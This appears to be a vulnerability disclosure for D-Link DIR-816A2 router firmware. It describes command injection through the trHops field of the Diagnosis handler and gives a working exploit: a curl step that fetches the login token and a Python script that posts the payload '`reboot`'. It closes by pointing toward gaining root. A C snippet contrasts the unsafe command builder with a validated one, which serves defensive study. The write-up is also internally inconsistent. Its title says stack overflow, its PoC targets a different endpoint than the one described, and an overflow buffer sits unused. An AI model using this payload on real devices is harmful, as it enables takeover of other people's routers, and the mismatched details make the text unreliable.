DIR-816A2_FWv1.10CNB05_R1B011D88210.img Stack overflow vulnerability

Overview

Affected version

Below is the latest firmware

Vulnerability details

The vulnerability is in the /goform/Diagnosis handler. When doType is 9 and pingAddr is not 0.0.0.0, the user-supplied trHops value is spliced into the buffer v10 by snprintf and the resulting string is passed to system(), so shell metacharacters in trHops give command injection.
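As an added illustration (not code from this repository or from the firmware), the pattern described above written out in C: the snprintf-into-system() builder beside a hardened version that accepts trHops only as a small decimal hop count and pingAddr only as an IPv4 literal, and fills an argv array for an exec-style call so no shell ever parses the request bytes. The command template and the traceroute binary name are assumptions; the firmware's real format string is not on this page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <arpa/inet.h>

/* Hypothetical stand-in for the handler's command template (assumption:
 * the real firmware's format string is not given on the page). */
static const char *CMD_FMT = "traceroute -m %s %s";

/* Vulnerable pattern: trHops is spliced straight into a shell command.
 * Returns bytes written, or -1 on truncation. The caller would then hand
 * `out` to system(); nothing here executes it. */
int build_cmd_unsafe(char *out, size_t outlen, const char *pingAddr, const char *trHops)
{
    int n = snprintf(out, outlen, CMD_FMT, trHops, pingAddr);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return n;
}

/* Hardened: accept only 1..255 written as 1-3 decimal digits. */
int valid_hops(const char *s)
{
    size_t len = strlen(s);
    if (len == 0 || len > 3)
        return 0;
    for (size_t i = 0; i < len; i++)
        if (!isdigit((unsigned char)s[i]))
            return 0;
    int v = atoi(s);
    return v >= 1 && v <= 255;
}

/* Hardened: accept only a dotted-quad IPv4 literal (no hostnames, no shell chars). */
int valid_ipv4(const char *s)
{
    struct in_addr a;
    return inet_pton(AF_INET, s, &a) == 1;
}

/* Hardened builder: validates both fields, then fills a NULL-terminated argv
 * for execv()/posix_spawn() instead of building a shell string.
 * Returns 0 on success, -1 if either field is rejected. */
int build_argv_safe(const char *av[5], const char *pingAddr, const char *trHops)
{
    if (!valid_hops(trHops) || !valid_ipv4(pingAddr))
        return -1;
    av[0] = "traceroute"; av[1] = "-m"; av[2] = trHops; av[3] = pingAddr; av[4] = NULL;
    return 0;
}
```

The unsafe builder accepts the backtick payload verbatim, while the hardened builder rejects it before any command is formed.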

Vulnerability verification

POC

Get the token ID

curl http://192.168.0.1/dir_login.asp | grep tokenid

Run the PoC

import requests

# Fill in with the tokenid value obtained from the curl step above.
tokenid = ''

# Endpoint as given in the original PoC; the write-up above names /goform/Diagnosis.
url = 'http://192.168.0.1/goform/form2Dhcpip.cgi'

# Left as in the original PoC; this variable is not used by the request below.
payload = b'a' * 10000

# doType 9 with a non-0.0.0.0 pingAddr reaches the snprintf/system() path;
# trHops carries the injected command.
data = {
    'tokenid': tokenid,
    'pingAddr': '192.168.0.1',
    'doType': '9',
    'trHops': '`reboot`'
}

print('payload sending...')
r = requests.post(url, data=data)
print('end')

The router reboots, confirming that the injected command ran; from there an exploit can be written to obtain root.